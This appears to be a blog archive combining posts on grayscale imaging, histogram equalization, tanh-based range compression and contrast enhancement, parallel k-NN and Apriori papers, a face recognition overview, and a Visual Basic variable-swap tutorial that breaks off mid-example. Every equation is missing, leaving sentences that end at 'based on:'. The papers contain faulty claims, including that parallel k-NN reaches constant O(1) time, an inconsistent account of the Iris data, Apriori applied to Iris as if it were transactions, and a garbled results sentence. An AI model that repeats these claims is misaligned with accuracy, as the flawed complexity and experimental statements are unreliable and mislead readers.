Grayscale images are often the result of measuring the intensity of light at each pixel in a single band of the electromagnetic spectrum (e.g. infrared, visible light, ultraviolet, etc.), and in such cases they are monochromatic proper when only a given frequency is captured. But also they can be synthesized from a full color image; see the section about converting to grayscale.

 

2.1 Numerical representations

The intensity of a pixel is expressed within a given range between a minimum and a maximum, inclusive. This range is represented in an abstract way as a range from 0 (total absence, black) and 1 (total presence, white), with any fractional values in between. This notation is used in academic papers, but it must be noted that this does not define what “black” or “white” is in terms of colorimetry.

Another convention is to employ percentages, so the scale is then from 0% to 100%. This is used for a more intuitive approach, but if only integer values are used, the range encompasses a total of only 101 intensities, which are insufficient to represent a broad gradient of grays. Also, the percentile notation is used in printing to denote how much ink is employed in halftoning, but then the scale is reversed, being 0% the paper white (no ink) and 100% a solid black (full ink).

In computing, although the grayscale can be computed through rational numbers, image pixels are stored in binary, quantized form. Some early grayscale monitors can only show up to sixteen (4-bit) different shades, but today grayscale images (as photographs) intended for visual display (both on screen and printed) are commonly stored with 8 bits per sampled pixel, which allows 256 different intensities (i.e., shades of gray) to be recorded, typically on a non-linear scale. The precision provided by this format is barely sufficient to avoid visible banding artifacts, but very convenient for programming due to a single pixel occupies then a single byte.

Technical uses (e.g. in medical imaging or remote sensing applications) often require more levels, to make full use of the sensor accuracy (typically 10 or 12 bits per sample) and to guard against round off errors in computations. Sixteen bits per sample (65,536 levels) is a convenient choice for such uses, as computers manage 16-bit words efficiently. The TIFF and the PNG (among other) image file formats supports 16-bit grayscale natively, although browsers and many imaging programs tend to ignore the low order 8 bits of each pixel.

No matter what pixel depth is used, the binary representations assume that 0 is black and the maximum value (255 at 8 bpp, 65,535 at 16 bpp, etc.) is white, if not otherwise noted.

 

2.2 Converting color to grayscale

Conversion of a color image to grayscale is not unique; different weighting of the color channels effectively represents the effect of shooting black-and-white film with different-colored photographic filters on the cameras. A common strategy is to match the luminance of the grayscale image to the luminance of the color image.

To convert any color to a grayscale representation of its luminance, first one must obtain the values of its red, green, and blue (RGB) primaries in linear intensity encoding, by gamma expansion. Then, add together 30% of the red value, 59% of the green value, and 11% of the blue value (these weights depend on the exact choice of the RGB primaries, but are typical). Regardless of the scale employed (0.0 to 1.0, 0 to 255, 0% to 100%, etc.), the resultant number is the desired linear luminance value; it typically needs to be gamma compressed to get back to a conventional grayscale representation.

This is not the method used to obtain the luma in the Y’UV and related color models, used in standard color TV and video systems as PAL and NTSC, as well as in the L*a*b color model. These systems directly compute a gamma-compressed luma as a linear combination of gamma-compressed primary intensities, rather than use linearization via gamma expansion and compression.

To convert a gray intensity value to RGB, simply set all the three primary color components red, green and blue to the gray value, correcting to a different gamma if necessary.

3. Histogram equalization

A histogram can represent any number of things, since its sole purpose is to graphically summarize the distribution of a single-variable set of data1. Each specific use targets some different features of histogram graphs, and when it boils down to image analysis, histograms are the de facto standard.

When viewing an image represented by a histogram, what we’re really doing is analyzing the number of pixels (vertically) with a certain frequency (horizontally). In essence, an equalized image is represented by an equalized histogram where the number of pixels is spread evenly over the available frequencies.

An overexposed image is defined as an image in which there are an excessive number of pixels with a high pixel frequency, while there is a shortage of low frequencies (Figure 3.2). The data in a histogram representing an overexposed image therefore is not spread evenly over the horizontal axis, instead skewing non-symmetrically to the absolute right edge of the graph (Figure 3.3).

Usually, when the number of pixels with very high pixel frequencies is so high – as shown in the example – it means that some image data has been lost; it is then impossible to restore detail in areas where the pixel frequencies have been cropped to a maximum value.

The same, of course, goes for underexposed images (Figure 3.4); images where the histogram is skewed non-symmetrically to the absolute left edge of the graph (Figure 3.5).

There are situations where we would want to reveal detail in an image that cannot easily be seen with the naked eye. One of the several techniques to enhance an image in such a manner is histogram equalization, which is commonly used to compare images made in entirely different circumstances. Extreme examples may include comparisons of photographs with different exposures, lighting angles and shadow casts3.

The concept of histogram equalization is to spread otherwise cluttered frequencies more evenly over the length of the histogram. Frequencies that lie close together will dramatically be stretched out. These respective areas of the image that first had little fluctuation will appear grainy and rigid, thereby revealing otherwise unseen details.

A histogram equalization algorithm will determine the ideal number of times each frequency should appear in the image and, theoretically, re-plot the histogram appropriately. However, because image data isn’t stored in an analogue manner, this is usually not possible. Instead, the image data is stored digitally and limited to n bits of color depth, thus the image cannot be requantified to meet our requirement.

Nevertheless, by ensuring that the number of times a frequency in a certain range remains as close to the ideally equalized histogram as possible, we can work around the issue of requantification. The solution is simple and elegant.

The ideal number of pixels per frequency i is the total number of pixels in the image divided by the total number of possible image frequencies N. The algorithm counts the frequencies from 0 to N and shifts as many pixel frequencies into that position as long as this number of pixels is less than or equal to a certain delimiter that increases linearly to

the frequency. If a pixel frequency doesn’t fit, it is pushed to the right along the horizontal axis until a place is found.

In the simplest scenario, histogram equalization is used on grayscale images. However, by converting a RGB image to HSV, we can equalize the Value channel without altering the Hue or Saturation. After converting the result back to RGB, a properly equalized image is produced (Figure 3.6 and Figure 3.7).

4. Dynamic Range Compression

We have used a sigmoid transfer function for increasing the dynamic range of an image. A hyperbolic tangent function is used for the reason of overcoming the natural loss in perceived lightness contrast that results when performing dynamic range compression. We have developed an enhancement strategy that will perform the range compression while maintaining the image details. The proposed solution is to develop the hyperbolic tangent functions that are tunable based on the statistical characteristics of the image. That is, the function will enhance the dark part of the image while preserving the light part of the image based on:

Where x, y the V component pixel is value in HSV color space and 0 ≤ I x,y ≤ 255 at (x, y) location of the image, ρ is the statistics of the image, and Ix,y is the enhanced pixel value which is normalized. The parameter ρ controls the curvature of the hyperbolic tangent function. This means that when the processing image is dark, ρ should be small and therefore the curvature of the hyperbolic tangent function will be steep and this will help the darker pixels to have brighter values. ρ can be expressed as:

Where x, y is the local mean of an image and k is the bias pixel intensity value. The local mean of each pixel is calculated based on the center surrounded property (k = 3) of a perceptual field and perceptual processes of human vision. The form of the surround function we used is Gaussian because it provides good dynamic range compression over a wide range of environments. Consequently, the local mean of the image is calculated by:

Where sis the standard deviation of the Gaussian distribution and c is selected so that òò x, y dxdy=1.The choice of spresents a tradeoff between the dynamic range compression and color rendition of the image

A smaller s will yield larger dynamic range compression but causes the image to lose its color. Conversely, a larger s will yield better color rendition but the shadow of the image will remain constant. Fig. 4.1 illustrates the variability of the hyperbolic tangent function based on Eq. (1) to (3). The output intensity range is converted to [0 255]. It can be observed that when the local mean of an image is small, the hyperbolic tangent function reshapes its curve towards the brighter pixel value to facilitate the rescaling of the range of the dark pixel to the brighter region. Conversely, when the local mean of an image is large, the hyperbolic tangent function compresses the brighter pixels to the darker region.

 

5. Contrast Enhancement

The dark shadows in images can be brightened while the local intensity contrast will be degraded using Eq. (1) – (3) because the nonlinear dynamic range compression decreases the intensity variation when darker pixels are brightened more with a larger ‘accelerate factor’ than those of lighter pixels. Fig. 5.1 illustrates the d

egradation of image contrast compared to that of original images (e.g. the clouds and the sky) due to the dynamic range compression. In order to improve the visual quality of images produced by the dynamic range compression, a contrast enhancement method is used to enhance the local contrast of these images. Therefore, after dynamic range compression and contrast enhancement, the visual quality of the original images with shadows created by high dynamic range scenes can be largely improved. In addition, enhancing the local contrast can also be useful for improving the performance of convolutional face finder, which is sensitive to local intensity variation (e.g. first and second derivative image information).

In the proposed contrast enhancement algorithm, the local intensity variation Iv is defined as in:

Where Ix, y and Iavg are the intensity enhanced image and its low-pass version, respectively. Iavg is computed using 2D convolution with a Gaussian kernel in    Eq. (3) in which 5≤ s≤10 by experiments. Iv, the difference between Ix, y and Iavg, can be either positive or negative, which accordingly represents a brighter or darker pixel compared with its neighbor pixels. The magnitude of Iv determines the local contrast of an image: larger magnitude indicates higher contrast and vice versus. Therefore, increasing the magnitude of Iv is an effective way to enhance local image contrast. The proposed contrast enhancement technique increases the magnitude of Iv using the power law operation as described in:

Β is tunable for adjusting the image contrast and β< 1. Where β has a default value of 0.75. Since β can be either an odd or even number, |Iv| instead of Iv is used to keep the result of Eq.

(5) Positive. Eq. (5) can increase low contrast (small |Iv|) while preserving high contrast (large |Iv|) because 0 ≤|Iv|≤1 Based on the result of |Iv,EN| and the sign of Iv, the enhanced local intensity variation Iv,EN can be obtained by restoring the sign no matter β is odd or even:

where sign(.) is defined as:

Finally, the intensity image (Ic,EN) with enhanced local contrast can be achieved by adding Iv,EN to Iavg as in:

Where the maximum of (Iv,EN + Iavg) is used to normalize (Iv,EN + Iavg) because (Iv,EN + Iavg) can be larger than 1.

The local contrast enhancement process can be illustrated using the images shown in Fig. 5.2. The luminance enhanced intensity image (Ix, y) and its local averaging result (Iavg) are shown in Fig. 5.1(b) and 5.1(a), respectively. Fig. 5.2(b) shows the magnitude image of |Iv|, the ‘bright’ regions represent those pixels which are either brighter or darker tha its neighboring pixels in the luminance enhanced intensity image (Ix, y). |Iv,EN|, the enhanced result of |Iv|, is shown in Fig. 5.2(c) where the edges (or features) are more obvious than those in Fig. 5.2(b), which indicates larger intensity variation compared to that represented by |Iv|. The final result of the local contrast enhancement is presented in Fig. 5.2(d) where image details are improved greatly due to the contrast enhancement algorithm defined by Eq.(4) – (8).

 

6. Color Remapping

For color images, a linear color remapping process based on the chromatic information of the original image is applied to the enhanced intensity image to recover the RGB color bands (r’, g’, b’) as in:

Where τ is the V component pixel value of HSV color space, which essentially is the maximum value among the original r, g and b values at each pixel location. In this case, the ratio of the original r, g and b can be maintained by applying the above linear color remapping. Hence, the color information of hue and saturation in the original image is preserved in the enhanced color image. One example of color image enhancement is presented in Fig. 6.1. The color consistency can be observed between the original image and enhanced image. Observe also that the local contrast of the enhanced image is capable of bringing out the fine details from the image.

Parallel k-Nearest Neighbor

Example of k-nearest neighbour classification

Image via Wikipedia

K-Nearest Neighbor or KNN algorithm is part of supervised learning that has been used in many applications including data mining, statistical pattern recognition, and image processing. The algorithm doesn’t build a classification model but instead it is based on values found in storage or memory. To identify the class of an input, the algorithm chooses the class to which the majority of the input’s k closest neighbors belong to. The KNN algorithm is considered as one of the simplest machine learning algorithms. However it is computationally expensive especially when the size of the training set becomes large which would cause the classification task to become very slow. Several attempts have been made to parallelize KNN on the GPU by taking advantage of the natural parallel architecture of GPU [5]. However, in this paper the KNN algorithm was parallelized on CPU by distributing the distance computations of the k nearest neighbors among different processors. The parallel implementation greatly increased the speed of the KNN algorithm by reducing its time complexity from O(D) ,where D is the number of records, to O(D/p) where p is the number of processors.

Keywords: K Nearest Neighbor, GPU, manycore, CPU, parallel processors.

INTRODUCTION

The KNN algorithm is a widely applied method for classification in machine learning and pattern recognition. It was known to be computationally intensive when given large training sets, and did not gain popularity until the 1960s when increased computing power became available.

Nearest-neighbor classifiers are based on learning by analogy, that is, by comparing a given test tuple with training tuples that are similar to it. The training tuples are described by n attributes. Each tuple represents a point in an n-dimensional space. In this way, all of the training tuples are stored in an n-dimensional pattern space. When given an unknown tuple, a k-nearest-neighbor classifier searches the pattern space for the k training tuples that are closest to the unknown tuple. These k training tuples are the k “nearest neighbors” of the unknown tuple. “Closeness” is defined in terms of a distance metric, such as Euclidean distance. The Euclidean distance between two points or tuples, say, X1 = (x11, x12, …, x1n) and X2 = (x21, x22, …, x2n), is:

 

dist(X1,X2) = (1)

 

The above algorithm applies for numerical data. For categorical attributes, a simple method is to compare the corresponding values of the attributes in tuple X1 with those in tuple X2. If the two are identical, then the difference between the two is taken as 0. If the two are different, then the difference is considered to be 1. Other methods may incorporate more sophisticated schemes for differential grading.

When computed in this way on a serial machine, the time complexity is clearly linear with respect to the number of data points. Hence, there is an interest in mapping the process onto a highly parallel machine in order to further optimize the running time of the algorithm. It should be noted, however, that serial implementations of the k-NN rule employing branch and bound search algorithms[1] (a systematic method for solving optimization problems) can scale sublinearly, such that the asymptotic time complexity may be constant with respect to the number of data points. Nonetheless, a fully parallel hardware implementation should still be much faster than the most efficient serial implementations.

Many parallel methods were conducted to increase the speed of the KNN algorithm including:

1.     The method uses Neural Networks for constructing a multi-layer feed-forward network that implements exactly a 1-NN rule. The advantage of this approach is that the resulting network can be implemented efficiently. The disadvantage is that the training time can’t grow exponentially for high dimensional pattern spaces, which could make it impractical.

 

2.     A CUDA implementation of the “brute force” kNN search described in [6] is performed. The advantage of this method is the highly parallelizable architecture of the GPU.

 

In this paper, the “brute force” kNN is studied and implemented on CPU rather than a GPU where the degree of parallelism is indicated by the number of available cores or processors. The proposed algorithm is not expected to outperform state-of-the art GPU implementations but rather, to provide an equivalent performance on CPU. Hence, the benefit becomes the ability of load sharing between CPU and GPU without degradation or loss of speed upon switching between any of the two processor architectures.

PROPOSED METHOD

 

The nature of the brute force kNN algorithm can be assumed to be highly parallelizable[2] by nature, since computation of the distance between the input sample and any single training sample is independent of the distance computation to any other sample. This allows for partitioning the computation work with least synchronization effort. In fact, no inter communication or message passing is required at all during the time each processor is computing the distance between samples in its local storage and the input sample. When all processors terminate the distance computation procedure, the final step is to select a master processor to collect the results from all processors, sort the distances in ascending order, and then use the first 8 measures to determine the class of the input sample.

 

The proposed algorithm is described in the following steps:

1.     Select 1 processor to be the master, the other N-1 processors are slaves.

2.     Master divides the training samples to N subsets, and distributes 1 subset for each processor, keeping 1 subset for local processing (Master participates in distance computation too).

3.     Each individual processor now computes the distance measures independently and storing the computes measures in a local array

4.     When each processor terminates distance calculation, the processor transmits a message to the master indicating end of processing

5.     Master then notes the end of processing for the sender processor and acquires the computes measures by copying them into its own array

6.     After the master has claimed all distance measures from all processors, the following steps are performed:

a.      Sort all distance measures in ascending order

b.     Select top k measures

c.      Count the number of classes in the top k measures

d.     The input element’s class will belong the class having the higher count among top k measures

EXPERIMENTS& RESULTS

 

The goal of this experiment was to study the performance of parallelizing KNN on CPU for large data sets versus parallel GPU implementations. Iris database was used to train the system which is “perhaps the best known database to be found in the pattern recognition literature” [7]. The data set contains three classes of fifty instances each, where each class refers to a type of iris plant. Five attributes are present in this database which are Sepal Length, Sepal Width, Petal Length, Petal Width, and the class label attribute which can contain three values: “Iris-setosa”, “Iris-virginica” and “Iris-versicolour”.  These datasets were preprocessed before running the algorithm by building new data structures so that they can fit in memory. However, given the small number of records in the Iris database, the experiment would not reflect solid results, thus all the 50 records were cloned and randomly appended 1000 times on to a new larger Iris database of 50,000 total records. The experiment was implemented on an Intel 8-core machine and the obtained results were compared with respective implementation on a 64-core GPU. In order to accommodate for the biased number of cores on the GPU, the degree of parallelism was set to 8 in order to properly compare with the number of cores on the CPU, so 8 cores were used out of the available 64-cores. By applying the above mentioned parallel procedures, the CPU program was able to compete with the GPU showing equivalent performance but outperforming the GPU after repeating the test for several times. This was due to cache locality because after several repeated runs, chances of cache misses became less frequent and therefore fetching time from memory incurred by continuous trips was diminished. This also improved Bus utilization and hence power consumption was reduced.  These results were expected because of the nature of KNN is that it highly parallelizable and it scales well with many-core architectures. Complexity of the parallel algorithm is O(D/p) where D is the number of records and p is the number of available cores. Hence, given p processors, complexity reduces to constant time O(1).

 

CONCLUSION

 

In this paper parallel KNN algorithm was implemented by applying a new approach to facilitate computation of the distance measures of all data points. The implementation of the parallel technique reduced the running time of the algorithm on CPU which would make the algorithm a faster, more efficient than the serial kNN and competitor to state-of-the art GPU based implementation.

Parallel Apriori algorithm for frequent pattern mining

Apriori is a frequent pattern mining algorithm for discovering association rules. It is one of the most well-known algorithms for discovering frequent patterns along with FP-Growth algorithm. However, as a result of the current advances in the area of storage of very large databases and the tremendous growth in number of transactions, sequential Apriori becomes a bottleneck because of the long running time of the algorithm. In this paper, our goal is to develop a new parallel version of Apriori that aims to reduce the overall running time of the algorithm. Although Apriori is not known to be highly parallelizable, several attempts have been made to parallelize it in various ways, either by using parallel I/O hardware to optimize database scans or by distributing the workload on multiple processors. However, many of the parallel approaches suffer from noticeable latencies in synchronizing results being collected from each individual processor after a parallel iteration terminates. Our approach focuses on trying to maximize the workload being executed in parallel and to minimize the synchronization point delays by adopting a parallel pre-computing scheme during generation of the superset. By applying our new approach, the running time of the algorithm is reduced by an order of magnitude compared to other parallel implementations of the same algorithm.

INTRODUCTION

Apriori is a frequent pattern mining algorithm for discovering association rules originally developed by Rakesh Agrawal and Ramakrishnan Srikant[4]. It operates on a list of transactions containing items (for example, products in a supermarket). Frequent occurrences of items with each other are mined by Apriori to discover relationship among different items. A single transaction is called an Itemset. Apriori uses a minimum support value as the main constraint to determine whether a set of items is frequent. In the first pass of the algorithm, it constructs the candidate 1-itemsets. The algorithm then generates the frequent 1-itemsets by pruning some candidate 1-itemsets if their support values are lower than the minimum support. After the algorithm finds all the frequent 1-itemsets, it joins the frequent 1-itemsets with each other to construct the candidate 2-itemsets and prune some infrequent itemsets from the candidate 2-itemsets to create the frequent 2-itemsets. This process is repeated until no more candidate itemsets can be created.

Apriori has a bottleneck when the number of transactions is very large since multiple database scans will be performed by apriori in every iteration. In order to improve the scalability of Apriori, several data structures and methods were constructed that can boost performance. These include:

Transaction Reduction: Atransaction that does not contain any frequent k-itemsets cannot contain any frequent (k+1)-itemsets. Therefore, such a transaction can be marked or removed from further consideration

Partitioning: A partitioning technique can be used that requires just two database scans to mine the frequent itemsets. It consists of two phases. In Phase I, the algorithm subdivides the transactions of D into n nonoverlapping partitions. If the minimum support threshold for transactions in D is min sup, then the minimum support count for a partition is minsup, the number of transactions in that partition. For each partition, all frequent itemsets within the partition are found. These are referred to as local frequent itemsets. In Phase II, a second scan of D is conducted in which the actual support of each candidate is assessed in order to determine the global frequent itemsets. Partition size and the number of partitions are set so that each partition can fit into main memory and therefore be read only once in each phase.

Sampling: The basic idea of the sampling approach is to pick a random sample S of the given data D, and then search for frequent itemsets in S instead of D. In this way, we trade off some degree of accuracy gainst efficiency. The sample size of S is such that the search for frequent itemsets in S can be done in main memory, and so only one scan of the transactions in S is required overall.

Dynamic itemset counting: A dynamic itemset counting technique [1] was proposed in which the database is partitioned into blocks marked by start points. In this variation, new candidate itemsets can be added at any start point, unlike in Apriori, which determines new candidate itemsets only immediately before each complete database scan. The technique is dynamic in that it estimates the support of all of the itemsets that have been counted so far, adding new candidate itemsets if all of their subsets are estimated to be frequent.

However, it seems that even with the above mentioned approaches, performance of Apriori decreases substantially when large number of transactions is involved. Therefore, many parallel approaches have been conducted to increase the speed of the Apriori algorithm including:

1. Partitioning the transactions into N partitions where N is the number of processors then for each iteration computes local support then exchange results with all N-1 processors to generate the next superset.[2]

2. Use a master/slave scheme by selecting one processor to be the master and N-1 processors to be working processors. In this approach, the input transactions are not partitioned but the master processor generates unique itemsets and divides the list of itemsets equally to the N-1 processors to compute their support. Once computations of supports complete, all N-1 processors send their results to the master in order to compute the next superset and divide the work further.[3]

In this paper, a variation of the 2nd approach is studied and implemented, where an additional data structure is used to predict itemsets of the next iteration and cache them for later retrieval thus reducing database scans. The 2nd approach is selected because it provides high flexibility with the way itemsets get computed between different cores and mainly because of the similarity of the master-slave architecture between this method and the proposed one.

PROPOSED METHOD

Our approach focuses on the algorithm part of Apriori by trying to maximize the workload being executed in parallel and to minimize, as much as possible, the synchronization point delays by allowing a portion of the superset generation forming the candidates to be generated in parallel as well. Only the remaining part of the superset will be generated at the synchronization point.

The proposed algorithm is described in the following steps:

1.     Select one processor to be the master, the other N-1 processors are slaves

2.     Create a local Hash Table, at the master; we refer to it as G during the remaining part of this paper.

3.     Initialize K, the itemset size, to 1

4.     Generate the 1-itemsets normally using the master processor only

5.     At the master, divide the k-itemsets into N-1 groups and assign each group to exactly 1 of the available N-1 processors. Then for each processor:

a.      Lookup the support of each local itemset in G, if it’s not found, compute support.

b.     Prune itemsets that have their support less than the minimum support where minimum support is the threshold value to decide upon whether to drop or keep an itemset. It is also global to the entire system.

c.      Generate the candidates of the K+1 itemsets from the local items and find their support.

d.     Store the results of the K+1 itemsets (the itemset and its support) into G.

e.      Send the master processor a signal indicating end of processing.

6.      At the master processor, at the end of each arrival of a finalization signal:

a.      Generate the K+1 superset using itemsets in G.

7.     Increment K by 1.

8.     Go to step 2 and repeat until there are no more itemsets to generate.

EXPERIMRNTS & RESULTS

The goal of this experiment was to study the performance of parallelizing Apriori on CPU for large data sets. Iris database was used to train the system which is “perhaps the best known database to be found in the pattern recognition literature” [7]. The data set contains three classes of fifty instances each, where each class refers to a type of iris plant. Five attributes are present in this database which are Sepal Length, Sepal Width, Petal Length, Petal Width, and the class label attribute which can contain three values: “Iris-setosa”, “Iris-virginica” and “Iris-versicolour”.  These datasets were preprocessed before running the algorithm by building new data structures so that they can fit in memory. However, given the small number of records in the Iris database, the experiment would not reflect solid results, thus all the 50 records were cloned and randomly appended 1000 times on to a new larger Iris database of 50,000 total records. The experiment was implemented on an Intel 8-core machine and the obtained results were recorded were compared to performance statistics of state-of-the art Apriori. By applying the above mentioned parallel procedures, the CPU program was able to compete with the state-of-the art Apriori. Results showed that the proposed method is as fast as state-of-the art method but is better regarding BUS utilization where 75% bus utilization was incurred by state-of-the art apriori and 34% bus utilization was incurred by our proposed method. This greatly reduced total power consumption of the algorithm.

CONCLUSION

In this paper parallel Apriori algorithm was implemented by applying a new approach using intermediate data structure for computing and caching k+1 superset for use in future iterations to facilitate computation of the superset in parallel and increase degree of parallelism. The implementation of the parallel technique showed competing results with state-of-the art apriori in speed but outperformed it in bus utilization by 40% the running time of the algorithm which would make the algorithm efficient for energy consumption than the current best Apriori.



Face Recognition: An Introduction

As the necessity for higher levels of security rises, technology is bound to swell to fulfill these needs. Any new creation, enterprise, or development should be uncomplicated and acceptable for end users in order to spread worldwide. This strong demand for user-friendly systems which can secure our assets and protect our privacy without losing our identity in a sea of numbers, grabbed the attention and studies of scientists toward what’s called biometrics.

Biometrics is the emerging area of bioengineering; it is the automated method of recognizing person based on a physiological or behavioral characteristic. There exist several biometric systems such as signature, finger prints, voice, iris, retina, hand geometry, ear geometry, and face.  Among these systems, facial recognition appears to be one of the most universal, collectable, and accessible systems.

Biometric face recognition, otherwise known as Automatic Face Recognition (AFR), is a particularly attractive biometric approach, since it focuses on the same identifier that humans use primarily to distinguish one person from another: their “faces”. One of its main goals is the understanding of the complex human visual system and the knowledge of how humans represent faces in order to discriminate different identities with high accuracy.

The face recognition problem can be divided into two main stages: face verification (or authentication), and face identification (or recognition).

The detection stage is the first stage; it includes identifying and locating a face in an image.

The recognition stage is the second stage; it includes feature extraction, where important information for discrimination is saved, and the matching, where the recognition result is given with the aid of a face database.

Several face recognition methods have been proposed. In the vast literature on the topic there are different classifications of the existing techniques. The following is one possible high-level classification:

• Holistic Methods: The whole face image is used as the raw input to the recognition system. An example is the well-known PCA-based technique introduced by Kirby and Sirovich, followed by Turk and Pentland.

• Local Feature-based Methods: Local features are extracted, such as eyes, nose and mouth. Their locations and local statistics (appearance) are the input to the recognition stage. An example of this method is Elastic Bunch Graph Matching (EBGM).

Although progress in face recognition has been encouraging, the task has also turned out to be a difficult endeavor. In the following sections, we give a brief review on technical advances and analyze technical challenges.

History

Automated face recognition is a relatively new concept. Developed in the 1960s, the first semi-automated system for face recognition required the administrator to locate features ( such as eyes, ears, nose, and mouth) on the photographs before it calculated distances and ratios to a common reference point, which were then compared to reference data. In the 1970s, Goldstein, Harmon, and Lesk used 21 specific subjective markers such as hair color and lip thickness to automate the recognition. The problem with both of these early solutions was that the measurements and locations were manually computed. In 1988, Kirby and Sirovich applied principle component analysis, a standard linear algebra technique, to the face recognition problem. This was considered somewhat of a milestone as it showed that less than one hundred values were required to accurately code a suitably aligned and normalized face image. In 1991, Turk and Pentland discovered that while using the eigenfaces techniques, the residual error could be used to detect faces in images; a discovery that enabled reliable real-time automated face recognition systems. Although the approach was somewhat constrained by the environmental factors, the nonetheless created significant interest in furthering development of automated face recognition technologies. The technology first captured the public’s attention from the media reaction to a trial implementation at the January 2001 Super Bowl, which captured surveillance images and compared them to a database of digital mugshots. This demonstration initiated much-needed analysis on how to use the technology to support national needs while being considerate of the public’s social and privacy concerns. Today, face recognition technology is being used to combat passport fraud, support law enforcement, identify missing children, and minimize benefit/identity fraud.

Overview

As one of the most successful applications of image analysis and understanding, face recognition has recently gained significant attention. Over the last ten years or so, it has become a popular area of research in computer vision and one of the most successful applications of image analysis and understanding.

Some examples of face recognition application areas are:

Enterprise Security Computer and physical access control
Government Events Criminal Terrorists screening; Surveillance
Immigration/Customs Illegal immigrant detection;

Passport/ ID Card authentication

Casino Filtering suspicious gamblers /VIPs
Toy Intelligent robotic
Vehicle Safety alert system based on eyelid movement

The largest face recognition systems in the world with over 75 million photographs that is actively used for visa processing operates in the U.S. Department of State.

In 2006, the performance of the latest face recognition algorithms was evaluated in the Face Recognition Grand Challenge. High-resolution face images, 3-D face scans, and iris images were used in the tests. The results indicated that the new algorithms are 10 times more accurate than the face recognition algorithms of 2002 and 100 times more accurate than those of 1995. Some of the algorithms were able to outperform human participants in recognizing faces and could uniquely identify identical twins.

Weaknesses vs. Strengths

Among the different biometric techniques facial recognition may not be the most reliable and efficient but it has several advantages over the others: it is natural, easy to use and does not require aid from the test subject. Properly designed systems installed in airports, multiplexes, and other public places can detect presence of criminals among the crowd. Other biometrics like fingerprints, iris, and speech recognition cannot perform this kind of mass scanning. However, questions have been raised on the effectiveness of facial recognition software in cases of railway and airport security.

Critics of the technology complain that the London Borough of Newham scheme has never recognized a single criminal, despite several criminals in the system’s database living in the Borough and the system having been running for several years. “Not once, as far as the police know, has Newham’s automatic facial recognition system spotted a live target.”

Despite the successes of many systems, many issues remain to be addressed. Among those issues, the following are prominent for most systems: the illumination problem, the pose problem, scale variability, images taken years apart, glasses, moustaches, beards, low quality image acquisition, partially occluded faces etc. Figures below show different images which present some of the problems encountered in face recognition. An additional important problem, on top of the images to be recognized, is how different face recognition systems are compared.

The illumination problem is illustrated in the following figure, where the same face appears differently due to the change in lighting. More specifically, the changes induced by illumination could be larger than the differences between individuals, causing systems based on comparing images to misclassify the identity of the input image.

The pose problem is illustrated in the following figure, where the same face appears differently due to changes in viewing condition. The pose problem has been divided into three categories: (1) the simple case with small rotation angles, (2) the most commonly addressed case, when there is a set of training image pairs (frontal and rotated images), and (3) the most difficult case, when training image pairs are not available and illumination variations are present.

Face Recognition Process

Regardless of the algorithm used, facial recognition is accomplished in a five step process.

1.     Image acquisition:

Image acquisition can be accomplished by digitally scanning an existing photograph or by using an electro-optical camera to acquire a live picture of a subject. Video can also be used as a source of facial images. The most existing facial recognition systems consist of a single camera. The recognition rate is relatively low when face images are of various pose and expression and different illumination. With increasing of the pose angle, the recognition rate decreases. The recognition rate decreases greatly when the pose angle is larger than 30 degrees. Different illumination is not a problem for some algorithms like LDA that can still recognize faces with different illumination, but this is not true for PCA. To overcome this problem, we can generate the face images with frontal view (or little rotation), moderate facial expression, and same illumination if PCA algorithm is being used.

2.     Image Preprocessing:

Face recognition algorithms have to deal with significant amounts of illumination variations between gallery and probe images. For this reason, image preprocessing algorithm that compensates for illumination variations in images is used prior to recognition. The images used are gray scaled.

Histogram equalization is used here to enhance important features by modifying the contrast of the image, reducing the noise and thus improving the quality of an image and improving face recognition. It is usually done on too dark or too bright images.

The idea behind image enhancement techniques is to bring out detail that is obscured, or simply to highlight certain features of interest in an image. Images are enhanced to improve the recognition performance of the system.

3.     Face Detection:

Face detection is a computer technology that determines the locations and sizes of human faces in arbitrary images. It detects facial features and ignores anything else, such as buildings, trees and bodies. Face detection can be regarded as a specific case of object-class recognition, a major task in computer vision. Software is employed to detect the location of any faces in the acquired image. Generalized patterns of what a face “looks like” are employed to pick out the faces.

The method devised by Viola and Jones, that is used here, uses Haar-like features. Even for a small image, the number of Haar-like features is very large, for a 24×24 pixel window one can generate more than 180000 features.

AdaBoost is used to train a classifier, which allows for a feature selection. The final classifier only uses a few hundred Haar-like features. Yet, it achieves a very good hit rate with a relatively low false detection rate.

4.     Feature Extraction

This module is responsible for composing a feature vector that is well enough to represent the face image. Its goal is to extract the relevant data from the captured sample. Feature extraction is divided into two categories, the holistic feature category and the local features category. Local feature based approaches try to automatically locate specific facial features such as eyes, nose and mouth based on known distances between them. The holistic feature category deals with the input face image as a whole.

Different methods are used to extract the identifying features of a face. The most popular method is called Principle Components Analysis (PCA), which is commonly referred to as the eigen face method. Another method used here is called Linear Discriminant Analysis (LDA), which is referred to as the fisher face method. Both LDA and PCA algorithms belong to the holistic feature category.

Template generation is the result of the feature extraction process. A template is a reduced set of data that represents the unique features of an enrollee’s face consisting of weights for each image in the database. The projected space can be seen as a feature space where each component is seen as a feature.

5.     Declaring a match

The Last step is to compare the template generated in step four with those in a database of known faces. In an identification application, the biometric device reads a sample and compares that sample against every record or template in the database, this process returns a match or a candidate list of potential matches that are close to the generated templates in the database. In a verification application, the generated template is only compared with one template in the database that of the claimed identity, which is faster.

Closest match is found by using the Euclidean distance which finds the minimum difference between the weights of the input image and the set of weights of all images in the database.

Swap 2 variables without using temporary variable!

Perhaps the oldest technique most of programmers use, whether beginners or professional coders, to swap 2 variables a and b, is to declare a new temporary variable c, copy a to c then assign b to a and finally assign c to b. The following code should look familiar:

        Dim a As Integer = 10
        Dim b As Integer = 20
        Dim c As Integer = a
        a = b
        b = c

This technique is really simple and easy to understand and perhaps this is the main reason of its widespread use. However, there is a minor problem using this technique, which is the allocation of a new variable(c) which incurs more memory usage. Although its just 1 more variable overhead, a total of 4 bytes integer it still represents a major drawback for memory-critical applications or on machines where memory space is too low or limited(such as mobile devices). The first new technique is also simple and has the advantage of not allocating space for a new temporary variable. This method uses addition and subtraction in a clever way in order to keep track of the a and b:

        Dim a As Integer = 10
        Dim b As Integer = 20
        a = a + b
        b = a - b
        a = a - b

Lets analyze this code line by line:

  1. a=10
  2. b=20
  3. a= 10 + 20 = 30
  4. b= 30 – 20 = 10
  5. a= 30 – 10 = 20
  6. Final result: a=20 and b=10

This is really a very nice and smart way of swapping. You can encapsulate it in a function that takes two arguments by reference so that you don’t have to remember this arithmetic steps each time but I will leave this as an exercise to the reader:). Now let’s take a look at the next method which involves multiplication and division instead of addition and subtraction:

        Dim a As Integer = 10
        Dim b As Integer = 20
        a = a * b
        b = a / b
